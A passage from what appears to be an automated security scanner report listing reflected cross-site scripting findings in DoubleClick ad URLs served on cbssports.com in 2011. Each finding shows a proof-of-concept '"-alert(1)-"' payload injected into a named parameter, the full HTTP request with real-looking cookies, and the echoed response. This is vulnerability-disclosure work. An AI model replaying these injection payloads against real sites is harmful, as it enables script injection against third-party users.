Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf16f"-alert(1)-"7e369353b08 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21cf16f"-alert(1)-"7e369353b08&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21cf16f"-alert(1)-"7e369353b08&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_2011");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

3.27. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37ee0"-alert(1)-"3d34f88242f was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=5937ee0"-alert(1)-"3d34f88242f&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=5937ee0"-alert(1)-"3d34f88242f&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=
...[SNIP]...

3.28. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73396"-alert(1)-"18438590649 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=73396"-alert(1)-"18438590649&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
22/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=73396"-alert(1)-"18438590649&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&ev
...[SNIP]...

3.29. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0fcf"-alert(1)-"47f798ca518 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c0fcf"-alert(1)-"47f798ca518&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c0fcf"-alert(1)-"47f798ca518&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

3.30. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e43bb"-alert(1)-"1134bc564bc was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=e43bb"-alert(1)-"1134bc564bc&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
6%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=e43bb"-alert(1)-"1134bc564bc&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

3.31. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb41b"-alert(1)-"3856831bc1c was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=fb41b"-alert(1)-"3856831bc1c&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:24:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
9/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=fb41b"-alert(1)-"3856831bc1c&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/htt
...[SNIP]...

3.32. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d07d0"-alert(1)-"428cd6eea0d was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=d07d0"-alert(1)-"428cd6eea0d&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
m/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=d07d0"-alert(1)-"428cd6eea0d&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
va
...[SNIP]...

3.33. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30a1f"-alert(1)-"2ca852a0d31 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=30a1f"-alert(1)-"2ca852a0d31 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6990
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:26:52 GMT
Expires: Wed, 27 Apr 2011 23:26:52 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=30a1f"-alert(1)-"2ca852a0d31http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "
...[SNIP]...

3.34. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 931fa"-alert(1)-"bfe7ab35173 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn931fa"-alert(1)-"bfe7ab35173&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
40390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn931fa"-alert(1)-"bfe7ab35173&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.21
...[SNIP]...

3.35. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f38f"-alert(1)-"85e64b01986 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US1f38f"-alert(1)-"85e64b01986&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
